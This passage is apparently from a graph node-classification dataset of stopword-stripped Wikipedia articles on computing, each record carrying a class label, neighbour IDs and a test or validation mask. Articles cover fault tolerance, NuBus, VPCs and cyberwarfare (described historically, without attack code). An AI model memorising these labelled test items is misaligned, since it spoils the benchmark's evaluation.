clocks replications exactly phase however possible build lockstep systems without requirement bringing replications synchrony requires making internal stored states started fixed initial state reset state alternatively internal state one replica copied another replica one variant dmr pair-and-spare two replicated elements operate lockstep pair voting circuit detects mismatch operations outputs signal indicating error another pair operates exactly way final circuit selects output pair proclaim error pair-and-spare requires four replicas rather three tmr used commercially fault-tolerant design advantages obvious many disadvantages hardware fault tolerance sometimes requires broken parts taken replaced new parts system still operational computing known hot swapping system implemented single backup known single point tolerant represents vast majority fault-tolerant systems systems mean time failures long enough operators time fix broken devices mean time repair backup also fails helps time failures long possible specifically required fault-tolerant system fault tolerance notably successful computer applications tandem computers built entire business machines used single-point tolerance create nonstop systems uptimes measured years fail-safe architectures may encompass also computer software example process replication data formats may also designed degrade gracefully html example designed forward compatible allowing new html entities ignored web browsers understand without causing document unusable difference fault tolerance systems rarely problems instance western electric crossbar systems failure rates two hours per forty years therefore highly fault resistant fault occur still stopped operating completely therefore fault tolerant",
    "neighbors": [
      6406,
      6281,
      2314,
      1049,
      2592,
      8226,
      8229,
      8998,
      6014,
      10111,
      1722,
      10429,
      2623,
      8259,
      9285,
      1606,
      1990,
      2887,
      1993,
      3529,
      2558,
      7753,
      11081,
      3923,
      10835,
      2901,
      7802,
      11604,
      8408,
      8025,
      2395,
      2012,
      7004,
      1891,
      8808,
      8810,
      5999,
      5363,
      6003,
      1013,
      6774,
      6392,
      3450,
      3582,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 9678,
    "label": 7,
    "text": "BioPharm_(US_company):biopharm us company biopharm systems american privately owned consulting managed services provider msp headquartered san mateo california focuses life sciences industry company specializes implementation integration migration upgrade private cloud hosting oracle clinical trial management system drug safety pharmacovigilance clinical data warehousing analytics clinical data management electronic data capture systems founded 1995 president ceo alex sefanov around corner oracle ’ headquarters silicon valley biopharm headquartered california offices united states united kingdom mr. sefanov founded company personal savings working consultant several major biotechnology pharmaceutical companies inspired start firm working closely oracle first clinical trial software application oracle clinical biopharm offers various hosting options dedicated hosting shared hosting software service saas data center san jose disaster recovery data center near sacramento biopharm services include implementing integrating client applications systems well providing validation training application support services company complies relevant regulations including title 21 cfr part 11",
    "neighbors": [
      6514,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 9679,
    "label": 0,
    "text": "Sture_Allén:sture allén sture allén born 31 december 1928 swedish retired professor computational linguistics university gothenburg permanent secretary swedish academy 1986 1999 born gothenburg elected chair 3 swedish academy 1980 also member norwegian academy science letters",
    "neighbors": [
      1890,
      5699
    ],
    "mask": "Test"
  },
  {
    "node_id": 9680,
    "label": 9,
    "text": "Defunctionalization:defunctionalization programming languages defunctionalization refers compile-time transformation eliminates higher-order functions replacing single first-order apply function technique first described john c. reynolds 1972 paper definitional interpreters higher-order programming languages reynolds observation given program contains finitely many function abstractions assigned replaced unique identifier every function application within program replaced call apply function function identifier first argument apply function job dispatch first argument perform instructions denoted function identifier remaining arguments one complication basic idea function abstractions may reference free variables situations defunctionalization must preceded closure conversion lambda lifting free variables function abstraction passed extra arguments apply addition closures supported first-class values becomes necessary represent captured bindings creating data structures instead single apply function dispatch function abstractions program various kinds control flow analysis including simple distinctions based arity type signature employed determine function may called function application site specialized apply function may referenced instead alternately target language may support indirect calls function pointers may efficient extensible dispatch-based approach besides use compilation technique higher-order functional languages defunctionalization studied particularly olivier danvy collaborators way mechanically transforming interpreters abstract machines defunctionalization also related technique object-oriented programming representing functions function objects alternative closures example given olivier danvy translated haskell given tree datatype defunctionalize following program defunctionalize replacing higher-order functions codice_1 codice_2 codice_3 value codice_4 datatype instead calling directly introduce codice_5 function interprets datatype",
    "neighbors": [
      2595,
      10246,
      9714,
      10581,
      5783,
      10616,
      10013
    ],
    "mask": "Test"
  },
  {
    "node_id": 9681,
    "label": 5,
    "text": "TDM-to-packet_conversion:tdm-to-packet conversion tdm-to-packet conversion process converting digital signal tdm format typically 64 kbit/second signal encoded mu-law a-law compression packets typically rtp packets carrying packet network internet conversion process may include recoding different codec silence suppression comfort noise generation tricks decrease bandwidth requirement improve perceived voice quality result note conversion signal tunnelling unlike tdm ip aims transporting tdm signal unchanged across ip network see also voice ip",
    "neighbors": [
      3168,
      9381
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9682,
    "label": 7,
    "text": "Virtual_private_cloud:virtual private cloud virtual private cloud vpc on-demand configurable pool shared computing resources allocated within public cloud environment providing certain level isolation different organizations denoted users hereafter using resources isolation one vpc user users cloud vpc users well public cloud users achieved normally allocation private ip subnet virtual communication construct vlan set encrypted communication channels per user vpc previously described mechanism providing isolation within cloud accompanied vpn function allocated per vpc user secures means authentication encryption remote access organization vpc resources introduction described isolation levels organization using service effect working 'virtually private cloud cloud infrastructure shared users hence name vpc vpc commonly used context cloud infrastructure service context infrastructure provider providing underlying public cloud infrastructure provider realizing vpc service infrastructure may different vendors amazon web services launched amazon virtual private cloud 26 august 2009 allows amazon elastic compute cloud service connected legacy infrastructure ipsec virtual private network connection aws vpc free use however users charged virtual private networks vpn use ec2 rds instances running vpc also purchased using reserved instances however limitation resources guaranteed google cloud platform resources provisioned connected isolated virtual private cloud vpc across gcp regions gcp vpcs global resources subnets within vpc zonal resources allows connect zones regions without use additional networking complexity data travels encrypted transit rest google ’ global private network identity management policies security rules allow private access google storage big data analytics managed services vpcs google cloud platform leverage security google data centers microsoft azure offers possibility setting vpc using virtual networks",
    "neighbors": [
      1539,
      6153,
      526,
      4623,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      5749,
      2170,
      4236,
      10893,
      3742,
      6307,
      2217,
      9906,
      7352,
      4289,
      3269,
      1224,
      6367,
      2795,
      3819,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      1840,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      3428,
      10090,
      6507,
      8044,
      5499,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      10681,
      448,
      2496,
      3521,
      11201,
      467,
      10200,
      6618,
      6632,
      1001,
      7660,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 9683,
    "label": 1,
    "text": "Variable_data_publishing:variable data publishing variable-data publishing vdp also known database publishing term referring output variable composition system systems produce electronically viewable hard-copy print output variable-data publishing term today often distinguishes output destined electronic viewing rather destined hard-copy print e.g variable data printing essentially techniques employed perform variable-data publishing utilized variable data printing difference interpretation output variable-data printing may interpreted produce various print streams page-description files e.g afp/ipds postscript pcl variable-data publishing produces electronically viewable files commonly seen forms pdf html xml variable-data composition involves use data conditionally variable-data may simple address block salutation however document textual content—including words sentences paragraphs pages entire document words make little much document composer desires variable data may also used exhibit various images logos products membership photos variable-data used build rule-based design schemes including fonts colors page formats possibilities vast variable-data tools available today make possible perform variable-data composition nearly every stage document production however level control achieved varies based upon far document production process variable-data tool deployed example variable-data insertion occurs prior output ... likely text flow layout altered nearly much control would available time initial document composition many organizations produce multiple forms output aka multi-channel output document ensures published content available recipients via form access method might require multi-channel output utilized integrity output channels often becomes important variable-data publishing may performed everything personal computer mainframe system however speed practical output volumes achieved directly affected computer power utilized term variable-data publishing likely offshoot term variable-data printing first introduced printing industry frank romano professor emeritus school print media college imaging arts sciences rochester institute technology however concept merging static document elements variable document elements predates term seen various implementations ranging simple desktop 'mail merge complex mainframe applications financial banking industry past term vdp closely associated digital printing machines however past 3 years application technology spread web pages emails mobile messaging",
    "neighbors": [
      1760,
      6830,
      8627,
      8628,
      9183,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9684,
    "label": 4,
    "text": "Firewalls_and_Internet_Security:firewalls internet security firewalls internet security repelling wily hacker 1994 book william r. cheswick steve bellovin helped define concept network firewall describing detail one first major firewall deployments book influenced formation perimeter security model became dominant network security architecture mid-1990s 2003 second edition came adding aviel d. rubin authors",
    "neighbors": [
      3941,
      3845,
      8998,
      939,
      18,
      4435
    ],
    "mask": "None"
  },
  {
    "node_id": 9685,
    "label": 3,
    "text": "ARM_Cortex-R:arm cortex-r arm cortex-r family 32-bit risc arm processor cores licensed arm holdings cores optimized hard real-time safety-critical applications cores family implement arm real-time r profile one three architecture profiles two application profile implemented cortex-a family microcontroller profile implemented cortex-m family arm cortex-r family microprocessors currently consists arm cortex-r4 f arm cortex-r5 f arm cortex-r7 f arm cortex-r8 f arm cortex-r52 f arm cortex-r family arm cores implementing r profile arm architecture profile designed high performance hard real-time safety critical applications similar profile applications processing adds features make fault tolerant suitable use hard real-time safety critical applications real time safety critical features added include arm holdings neither manufactures sells cpu devices based designs rather licenses core designs interested parties arm offers variety licensing terms varying cost deliverables licensees arm provides integratable hardware description arm core well complete software development toolset right sell manufactured silicon containing arm cpu integrated device manufacturers idm receive arm processor ip synthesizable rtl written verilog form ability perform architectural level optimizations extensions allows manufacturer achieve custom design goals higher clock speed low power consumption instruction set extensions optimizations size debug support etc determine components included particular arm cpu chip consult manufacturer datasheet related documentation cortex-r suitable use computer-controlled systems low latency and/or high level safety required example hard real-time safety critical application would modern electronic braking system automobile system needs fast responsive plethora sensor data input also responsible human safety failure system could lead severe injury loss life examples hard real-time and/or safety critical applications include",
    "neighbors": [
      7170,
      10767,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      2097,
      11314,
      8253,
      6207,
      7745,
      7234,
      7235,
      7747,
      2635,
      8268,
      99,
      7269,
      8812,
      11374,
      7281,
      10361,
      1660,
      638,
      11395,
      644,
      8842,
      146,
      659,
      1170,
      9366,
      7833,
      666,
      5786,
      9371,
      4258,
      4773,
      682,
      9391,
      2224,
      11447,
      9913,
      1722,
      5823,
      8383,
      10945,
      9928,
      4821,
      2788,
      9964,
      6391,
      3835,
      2814,
      781,
      7445,
      5417,
      2862,
      11054,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      5457,
      2388,
      6495,
      1377,
      8551,
      11629,
      6001,
      373,
      11125,
      392,
      3467,
      6033,
      1428,
      4508,
      5028,
      7077,
      9638,
      9155,
      9163,
      6607,
      6608,
      7631,
      980,
      2517,
      9174,
      10199,
      4569,
      2524,
      9182,
      3050,
      1014,
      3575,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9686,
    "label": 2,
    "text": "NuBus:nubus nubus pron 'new bus 32-bit parallel computer bus originally developed mit standardized 1987 part numachine workstation project first complete implementation nubus done western digital numachine lisp machines inc. lmi lambda nubus later incorporated lisp products texas instruments explorer used main expansion bus apple computer next longer widely used outside embedded market early microcomputer buses like s-100 often connections pins microprocessor power rails meant change computer architecture generally led new bus well looking avoid problems future nubus designed independent processor general architecture details i/o handling among many advanced features era nubus used 32-bit backplane 8- 16-bit busses common seen making bus future-proof generally believed 32-bit systems would arrive near future 64-bit buses beyond would remain impractical excessive addition nubus agnostic processor buses point conformed signalling data standards machine plugged big little endian instance nubus made assumptions meant nubus card could plugged nubus machine long appropriate device driver order select proper device driver nubus included id scheme allowed cards identify host computer startup meant user n't configure system bane bus systems point instance isa driver configured card memory required interrupts used nubus required configuration making one first examples plug-and-play architecture downside flexibility made nubus much simpler user device driver authors made things difficult designers cards whereas simple bus systems easily supported handful input/output chips designed used cpu mind nubus every card computer convert everything platform-agnostic nubus world typically meant adding nubus controller chip bus i/o chips card increasing costs trivial exercise today one newer buses require 1980s nubus considered complex expensive nubus became standard 1987 ieee 1196 version used standard 96-pin three-row connector running system 10 mhz clock maximum burst throughput 40 mb/s average speeds 10 20 mb/s later addition nubus 90 increased clock rate 20 mhz better throughput burst increasing 70 mb/s average 30 mb/s nubus first developed commercially western digital numachine first used production product licensee lisp machines inc. lmi-lambda lisp machine project development group sold western digital texas instruments 1984 technology incorporated ti explorer also lisp machine 1986 texas instruments used nubus s1500 multiprocessor unix system later texas instruments symbolics developed lisp machine nubus boards ti microexplorer symbolics macivory based lisp supporting microprocessors nubus boards co-processor lisp machines apple macintosh line mac ii mac quadras nubus also selected apple computer use macintosh ii project plug-n-play nature fit well mac philosophy ease-of-use used macintosh ii series made professional-level mac lineup late 1980s upgraded nubus 90 starting macintosh quadras used mid-1990s early quadras supported 20 mhz rate two cards talking since motherboard controller upgraded later addressed nubus implementation 660av 840av models improved nubus controller used first generation power macintosh 6100 7100 8100 models later power mac models adopted intel pci bus apple nubus implementation used pin socket connectors back card rather edge connectors phillips screws inside case cards use making much easier install cards apple computers also supplied always-on +5 v trickle power supply tasks watching phone line computer turned apparently part unapproved nubus standard nubus also selected next computer line machines used different physical pcb layout nubus appears seen little use outside roles apple switched pci mid 1990s nubus quickly disappeared",
    "neighbors": [
      4741,
      6283,
      5520,
      7824,
      10104,
      7830,
      6807,
      408,
      799,
      8480,
      7842,
      2723,
      7844,
      1576,
      9641,
      6187,
      7211,
      8625,
      8893,
      5058,
      5829,
      3911,
      4807,
      4810,
      5457,
      10833,
      8534,
      989,
      9952,
      11627,
      6510,
      6130,
      5619,
      6258,
      3445,
      5368,
      377,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 9687,
    "label": 1,
    "text": "Percona_Server_for_MySQL:percona server mysql percona server mysql distribution mysql relational database management system created percona percona server mysql open source relational database management system rdbms free fully compatible drop replacement oracle mysql software includes number scalability availability security backup features available mysql commercial enterprise edition software includes xtradb enhanced distribution innodb storage engine developers aim retain close compatibility official mysql releases focusing performance increased visibility server operations",
    "neighbors": [
      11392,
      8195,
      8582,
      10258,
      5397,
      10389,
      7453,
      1950,
      9503,
      7339,
      7983,
      9010,
      823,
      6721,
      5964,
      5198,
      2130,
      7506,
      10459,
      6245,
      8295,
      8683,
      5612,
      2413,
      7022,
      3188,
      10873,
      2810,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9688,
    "label": 4,
    "text": "Cyberwarfare:cyberwarfare cyberwarfare broad term describing use technological force within cyberspace ‘ cyberwarfare ’ imply scale protraction violence typically associated term ‘ war ’ significant debate among experts regarding definition cyberwarfare even thing exists term ‘ cyberwarfare ’ misnomer date offensive cyber actions could described ‘ war ’ offensive cyber actions estonia 2007 georgia 2008 iran 2010 north korea occurred context international relations resulting condemnation denial sides cyberwarfare may meet typical definition term war however many states including united states united kingdom russia india china israel iran north korea vietnam active cyber operations offensive defensive operations states explore use cyber operations combine capabilities likelihood physical confrontation violence playing result part cyber operation increased however meeting scale protracted nature war unlikely thus ambiguity remains first instance kinetic force used response cyber-attack resulting loss human life observed may 5 2019 israel defense forces targeted destroyed building associated on-going cyber-attack 'cyberwarfare used board context denote interstate use technological force within computer networks information stored shared communicated online term warfare significant differences term 'war invokes ideas scale protraction cyberwarfare also distinct closely related 'cyber espionage 'cyber terrorism 'cyber crime term definition remain subject debate absolute definition widely agreed paulo shakarian colleagues put forward following definition drawing various works including clausewitz definition war war continuation politics means cyberwarfare extension policy actions taken cyberspace state actors non-state actors significant state direction support constitute serious threat another state security action nature taken response serious threat state security actual perceived definitions focus act penetrating states computer network infrastructure businesses organisations within target nation former us national coordinator security infrastructure protection counter-terrorism richard a. clarke defines cyberwarfare actions nation-state penetrate another nation computers networks purposes causing damage disruption majority scholars military governments use definition refer state state-sponsored actors actors provided significant direction support state definitions may include non-state actors terrorist groups companies political ideological extremist groups terrorist hacktivists transnational criminal organizations depending context work debate whether term 'cyberwarfare accurate eugene kaspersky founder kaspersky lab concludes cyberterrorism accurate term cyberwar states today attacks clueless strike cyber-war cyberterrorism howard schmidt former cyber security coordinator obama administration said cyberwar ... think terrible metaphor think terrible concept winners environment experts take issue possible consequences linked warfare analogy ron deibert canada citizen lab warned militarization cyberspace militaristic responses may appropriate although date even serious cyber attacks disrupted large parts nations electrical grids 230,000 customers ukraine 2015 affected access medical care thus endangering life nhs wannacry 2017 lead military action oxford academic lucas kello proposed new term – unpeace – denote highly damaging cyber actions whose non-violent effects rise level traditional war actions neither warlike peacelike although non-violent thus acts war damaging effects economy society may greater even armed attacks term closely related concept grey zone come prominence recent years describing actions fall traditional threshold war term 'cyberwarfare distinct term 'cyber war cyber warfare includes techniques tactics procedures may involved cyber war discussed term war inherently refers large scale action typically protracted period time may include objectives seeking utilize violence aim kill cyber war could accurately describe protracted period back-and-forth cyber attacks including combination traditional military action nations date action known occurred although tit-for-tat military-cyber actions occurred june 2019 united states launched cyber attack iranian weapons systems retaliation shooting us drone strait hormuz cyber warfare present multitude threats towards nation basic level cyber attacks used support traditional warfare example tampering operation air defences via cyber means order facilitate air attack aside hard threats cyber warfare also contribute towards soft threats espionage propaganda eugene kaspersky founder kaspersky lab equates large-scale cyber weapons flame nettraveler company discovered biological weapons claiming interconnected world potential equally destructive traditional espionage act war cyber-espionage generally assumed ongoing major powers despite assumption incidents cause serious tensions nations often described attacks example cyber attacks 25 espionage based computers satellites coordinate activities vulnerable components system could lead disruption equipment compromise military systems c4istar components responsible orders communications could lead interception malicious replacement power water fuel communications transportation infrastructure may vulnerable disruption according clarke civilian realm also risk noting security breaches already gone beyond stolen credit card numbers potential targets also include electric power grid trains stock market mid-july 2010 security experts discovered malicious software program called stuxnet infiltrated factory computers spread plants around world considered first attack critical industrial infrastructure sits foundation modern economies notes new york times stuxnet extremely effective delaying iran nuclear program development nuclear weaponry came high cost first time became clear could cyber weapons defensive could offensive large decentralization scale cyberspace makes extremely difficult direct policy perspective non-state actors play large part cyberwar space state actors leads dangerous sometimes disastrous consequences small groups highly skilled malware developers able effectively impact global politics cyber warfare large governmental agencies major aspect ability lies willingness groups share exploits developments web form arms proliferation allows lesser hackers become proficient creating large scale attacks small handful skillful enough manage addition thriving black markets kinds cyber weapons buying selling cyber capabilities highest bidder without regard consequences computing denial-of-service attack dos attack distributed denial-of-service attack ddos attack attempt make machine network resource unavailable intended users perpetrators dos attacks typically target sites services hosted high-profile web servers banks credit card payment gateways even root nameservers dos attacks may limited computer-based methods strategic physical attacks infrastructure devastating example cutting undersea communication cables may severely cripple regions countries regards information warfare ability federal government united states admits electric power grid susceptible cyberwarfare united states department homeland security works industries identify vulnerabilities help industries enhance security control system networks federal government also working ensure security built next generation smart grid networks developed april 2009 reports surfaced china russia infiltrated u.s. electrical grid left behind software programs could used disrupt system according current former national security officials north american electric reliability corporation nerc issued public notice warns electrical grid adequately protected cyber attack china denies intruding u.s. electrical grid one countermeasure would disconnect power grid internet run net droop speed control massive power outages caused cyber attack could disrupt economy distract simultaneous military attack create national trauma iranian hackers possibly iranian cyber army pushed massive power outage 12 hours 44 81 provinces turkey holding 40 million people istanbul ankara among places suffering blackout howard schmidt former cyber-security coordinator us commented possibilities possible hackers gotten administrative computer systems utility companies says n't linked equipment controlling grid least developed countries schmidt never heard grid hacked june 2019 russia said electrical grid cyber-attack united states new york times reported american hackers united states cyber command planted malware potentially capable disrupting russian electrical grid cyber propaganda effort control information whatever form takes influence public opinion form psychological warfare except uses social media fake news websites digital means 2018 sir nicholas carter chief general staff british army stated kind attack actors russia form system warfare seeks de-legitimise political social system military strength based jowell o'donnell 2006 state propaganda deliberate systematic attempt shape perceptions manipulate cognitions direct behavior achieve response furthers desired intent propagandist p. 7 internet phenomenal means communication people get message across huge audience opens window evil terrorist organizations use medium brainwash people suggested restricted media coverage terrorist attacks would turn decrease number terrorist attacks occur afterwards cowen 2006 2017 wannacry petya notpetya cyber attacks masquerading ransomware caused large-scale disruptions ukraine well u.k. ’ national health service pharmaceutical giant merck maersk shipping company organizations around world attacks also categorized cybercrimes specifically financial crime negatively affects company group idea cyber pearl harbor debated scholars drawing analogy historical act war others used cyber 9/11 draw attention nontraditional asymmetric irregular aspect cyber action state number reasons nations undertake offensive cyber operations cyber security expert adviser nato advocates states take cyber warfare seriously viewed attractive activity many nations times war peace offensive cyber operations offer large variety cheap risk-free options weaken countries strengthen positions considered long-term geostrategic perspective cyber offensive operations cripple whole economies change political views agitate conflicts within among states reduce military efficiency equalize capacities high-tech nations low-tech nations use access critical infrastructures blackmail u.s. general keith b. alexander first head uscybercom told senate armed services committee computer network warfare evolving rapidly mismatch technical capabilities conduct operations governing laws policies cyber command newest global combatant sole mission cyberspace outside traditional battlefields land sea air space attempt find necessary neutralize cyberattacks defend military computer networks alexander sketched broad battlefield envisioned computer warfare command listing kind targets new headquarters could ordered attack including traditional battlefield prizes – command-and-control systems military headquarters air defense networks weapons systems require computers operate one cyber warfare scenario cyber shockwave wargamed cabinet level former administration officials raised issues ranging national guard power grid limits statutory authority distributed nature internet based attacks means difficult determine motivation attacking party meaning unclear specific act considered act war examples cyberwarfare driven political motivations found worldwide 2008 russia began cyber attack georgian government website carried along georgian military operations south ossetia 2008 chinese 'nationalist hackers attacked cnn reported chinese repression tibet jobs cyberwarfare become increasingly popular military four branches united states military actively recruit cyber warfare positions potential targets internet sabotage include aspects internet backbones web internet service providers varying types data communication mediums network equipment would include web servers enterprise information systems client server systems communication links network equipment desktops laptops businesses homes electrical grids financial networks telecommunication systems also deemed vulnerable especially due current trends computerization automation politically motivated hacktivism involves subversive use computers computer networks promote agenda potentially extend attacks theft virtual sabotage could seen cyberwarfare – mistaken hacktivists use knowledge software tools gain unauthorized access computer systems seek manipulate damage material gain cause widespread destruction draw attention cause well-publicized disruptions select targets anonymous hacktivist groups often portrayed media cyber-terrorists wreaking havoc hacking websites posting sensitive information victims threatening attacks demands met however hacktivism politically motivated change world use fundamentalism groups like anonymous divided opinion methods cyber attacks including ransomeware used generate income states use techniques generate significant sources income evade sanctions perhaps simultaneously harming adversaries depending targets tactic observed august 2019 revealed north korea generated 2 billion fund weapons program avoiding blanket sanctions levied united states united nations european union computer hacking represents modern threat ongoing global conflicts industrial espionage presumed widely occur typical type crime underreported extent known according mcafee george kurtz corporations around world face millions cyberattacks day attacks n't gain media attention lead strong political statements victims type crime usually financially motivated examinations issue cyberwarfare achieving profit personal gain still institutes companies like university cincinnati kaspersky security lab trying increase sensibility topic researching publishing new security threats number countries conduct exercise increase preparedness explore strategy tactics operations involved conducting defending cyber attacks nations typically done form war games cooperative cyber defence centre excellence ccdce part north atlantic treaty organisation nato conducted yearly war game called locked shields since 2010 designed test readiness improve skills strategy tactics operational decision making participating national organisations locked shields 2019 saw 1200 participants 30 nations compete red team vs. blue team exercise war game involved fictional country berylia experiencing deteriorating security situation number hostile events coincide coordinated cyber attacks major civilian internet service provider maritime surveillance system attacks caused severe disruptions power generation distribution 4g communication systems maritime surveillance water purification plant critical infrastructure components ccdce describe aim exercise maintain operation various systems intense pressure strategic part addresses capability understand impact decisions made strategic policy level ultimately france winner locked shields 2019 european union conduct cyber war game scenarios member states partner nations improve readiness skills observe strategic tactical decisions may affect scenario well war games serve broader purpose explore options improve skills cyber war games targeted preparing specific threats 2018 sunday times reported uk government conducting cyber war games could blackout moscow types war games move beyond defensive preparedness previously described onto preparing offensive capabilities used deterrence 'war approximately 120 countries developing ways use internet weapon target financial markets government computer systems utilities foreign policy magazine puts size china hacker army anywhere 50,000 100,000 individuals diplomatic cables highlight us concerns china using access microsoft source code 'harvesting talents private sector boost offensive defensive capabilities 2018 cyberattack marriott hotel chain collected personal details roughly 500 million guests known part chinese intelligence-gathering effort also hacked health insurers security clearance files millions americans hackers suspected working behalf ministry state security country communist-controlled civilian spy agency information exactly chinese use root spies recruit intelligence agents build rich repository americans ’ personal data future targeting 2008 article culture mandala bulletin centre east-west cultural economic studies jason fritz alleges chinese government 1995 2008 involved number high-profile cases espionage primarily use decentralized network students business people scientists diplomats engineers within chinese diaspora defector belgium purportedly agent claimed hundreds spies industries throughout europe defection australia chinese diplomat chen yonglin said 1,000 country 2007 russian executive sentenced 11 years passing information rocket space technology organization china targets united states included 'aerospace engineering programs space shuttle design c4isr data high-performance computers nuclear weapon design cruise missile data semiconductors integrated circuit design details us arms sales taiwan china continues held responsible string cyber-attacks number public private institutions united states india russia canada france chinese government denies involvement cyber-spying campaigns administration maintains position china threat rather victim increasing number cyber-attacks reports china cyber warfare capabilities yet confirmed chinese government according fritz china expanded cyber capabilities military technology acquiring foreign military technology fritz states chinese government uses new space-based surveillance intelligence gathering systems anti-satellite weapon anti-radar infrared decoys false target generators assist quest support informationization military increased education soldiers cyber warfare improving information network military training built virtual laboratories digital libraries digital campuses informationization hope prepare forces engage different kind warfare technically capable adversaries many recent news reports link china technological capabilities beginning new 'cyber cold war response reports cyberattacks china united states amitai etzioni institute communitarian policy studies suggested china united states agree policy mutually assured restraint respect cyberspace would involve allowing states take measures deem necessary self-defense simultaneously agreeing refrain taking offensive steps would also entail vetting commitments operation shady rat ongoing series cyber attacks starting mid-2006 reported internet security company mcafee august 2011 china widely believed state actor behind attacks hit least 72 organizations including governments defense contractors department information technology created indian computer emergency response team cert-in 2004 thwart cyber attacks india year 23 reported cyber security breaches 2011 13,301 year government created new subdivision national critical information infrastructure protection centre nciipc thwart attacks energy transport banking telecom defence space sensitive areas executive director nuclear power corporation india npcil stated february 2013 company alone forced block ten targeted attacks day cert-in left protect less critical sectors high-profile cyber attack 12 july 2012 breached email accounts 12,000 people including officials ministry external affairs ministry home affairs defence research development organisation drdo indo-tibetan border police itbp government-private sector plan overseen national security advisor nsa shivshankar menon began october 2012 intends beef india cyber security capabilities light group experts findings india faces 470,000 shortfall experts despite country reputation software powerhouse february 2013 information technology secretary j. satyanarayana stated nciipc finalizing policies related national cyber security would focus domestic security solutions reducing exposure foreign technology steps include isolation various security agencies ensure synchronised attack could succeed fronts planned appointment national cyber security coordinator month significant economic physical damage india related cyber attacks 26 november 2010 group calling indian cyber army hacked websites belonging pakistan army others belong different ministries including ministry foreign affairs ministry education ministry finance pakistan computer bureau council islamic ideology etc attack done revenge mumbai terrorist attacks 4 december 2010 group calling pakistan cyber army hacked website india top investigating agency central bureau investigation cbi national informatics center nic begun inquiry july 2016 cymmetria researchers discovered revealed cyber attack dubbed 'patchwork compromised estimated 2500 corporate government agencies using code stolen github dark web examples weapons used exploit sandworm vulnerability cve-2014-4114 compiled autoit script uac bypass code dubbed uacme targets believed mainly military political assignments around southeast asia south china sea attackers believed indian origin gathering intelligence influential parties defence cyber agency indian military agency responsible cyberwarfare expected become operational november 2019 chinese blamed cybersecurity company f-secure labs found malware nanhaishu targeted philippines department justice sent information infected machine server chinese ip address malware considered particularly sophisticated nature introduced phishing emails designed look like coming authentic sources information sent believed relating south china sea legal case russia still part soviet union 1982 portion trans-siberia pipeline within territory exploded allegedly due computer malware implanted pirated canadian software central intelligence agency malware caused scada system running pipeline malfunction farewell dossier provided information attack wrote compromised computer chips would become part soviet military equipment flawed turbines would placed gas pipeline defective plans would disrupt output chemical plants tractor factor caused monumental nonnuclear explosion fire ever seen space however soviet union blame united states attack russian south ossetian georgian azerbaijani sites attacked hackers 2008 south ossetia war russian-led cyberattacks br claimed russian security services organized number denial service attacks part cyber-warfare countries notably 2007 cyberattacks estonia 2008 cyberattacks russia south ossetia georgia azerbaijan one identified young russian hacker said paid russian state security services lead hacking attacks nato computers studying computer sciences department defense information tuition paid fsb july 2009 series coordinated denial service attacks major government news media financial websites south korea united states many thought attack directed north korea one researcher traced attacks united kingdom security researcher chris kubecka presented evidence multiple european union united kingdom companies unwittingly helped attack south korea due w32.dozer infections malware used part attack companies used attack partially owned several governments complicating attribution july 2011 south korean company sk communications hacked resulting theft personal details including names phone numbers home email addresses resident registration numbers 35 million people trojaned software update used gain access sk communications network links exist hack malicious activity believed part broader concerted hacking effort ongoing tensions korean peninsula south korea defense ministry stated south korea going improve cyber-defense strategies hopes preparing possible cyber attacks march 2013 south korea major banks – shinhan bank woori bank nonghyup bank – well many broadcasting stations – kbs ytn mbc – hacked 30,000 computers affected one biggest attacks south korea faced years although remains uncertain involved incident immediate assertions north korea connected threatened attack south korea government institutions major national banks traditional newspapers numerous times – reaction sanctions received nuclear testing continuation foal eagle south korea annual joint military exercise united states north korea cyber warfare capabilities raise alarm south korea north korea increasing manpower military academies specializing hacking current figures state south korea 400 units specialized personnel north korea 3,000 highly trained hackers portrays huge gap cyber warfare capabilities sends message south korea step strengthen cyber warfare command forces therefore order prepared future attacks south korea united states discuss deterrence plans security consultative meeting scm scm plan developing strategies focuses accelerating deployment ballistic missiles well fostering defense shield program known korean air missile defense april 2007 estonia came cyber attack wake relocation bronze soldier tallinn largest part attacks coming russia official servers authorities russia attack ministries banks media targeted attack estonia seemingly small baltic nation effective nation run online estonia implemented e-government bank services political elections taxes done online attack really hurt estonia economy people estonia least 150 people injured first day due riots streets 2013 french minister defense mr jean-yves le drian ordered creation cyberarmy representing 4th national army corp along ground naval air forces french ministry defense protect french european interests soil abroad contract made french firm eads airbus identify secure main elements susceptible cyber threats 2016 france thus built largest cyberarmy europe planned 2600 cyber-soldiers 440 million euros investment cybersecurity products new army corp. additional 4400 reservists constitute heart army 2019 2013 germany revealed existence 60-person computer network operation unit german intelligence agency bnd announced seeking hire 130 hackers new cyber defence station unit march 2013 bnd president gerhard schindler announced agency observed five attacks day government authorities thought mainly originate china confirmed attackers far accessed data expressed concern stolen information could used basis future sabotage attacks arms manufacturers telecommunications companies government military agencies shortly edward snowden leaked details u.s. national security agency cyber surveillance system german interior minister hans-peter friedrich announced bnd would given additional budget 100 million euros increase cyber surveillance capability 5 total internet traffic germany 20 total traffic maximum amount allowed german law netherlands cyber defense nationally coordinated ncsc dutch ministry defense laid cyber strategy 2011 first focus improve cyber defense handled joint branch jivc improve intel operations intel community netherlands including military intel organization mivd set joint sigint cyber unit jscu ministry defense furthermore setting offensive cyber force called defensie cyber command dcc operational end 2014 january 2017 sweden armed forces subjected cyber-attack caused shutdown so-called caxcis system used military exercises according crowdstrike 2014 2016 russian apt fancy bear used android malware target ukrainian army rocket forces artillery distributed infected version android app whose original purpose control targeting data d-30 howitzer artillery app used ukrainian officers loaded x-agent spyware posted online military forums attack claimed crowdstrike successful 80 ukrainian d-30 howitzers destroyed highest percentage loss artillery pieces army percentage 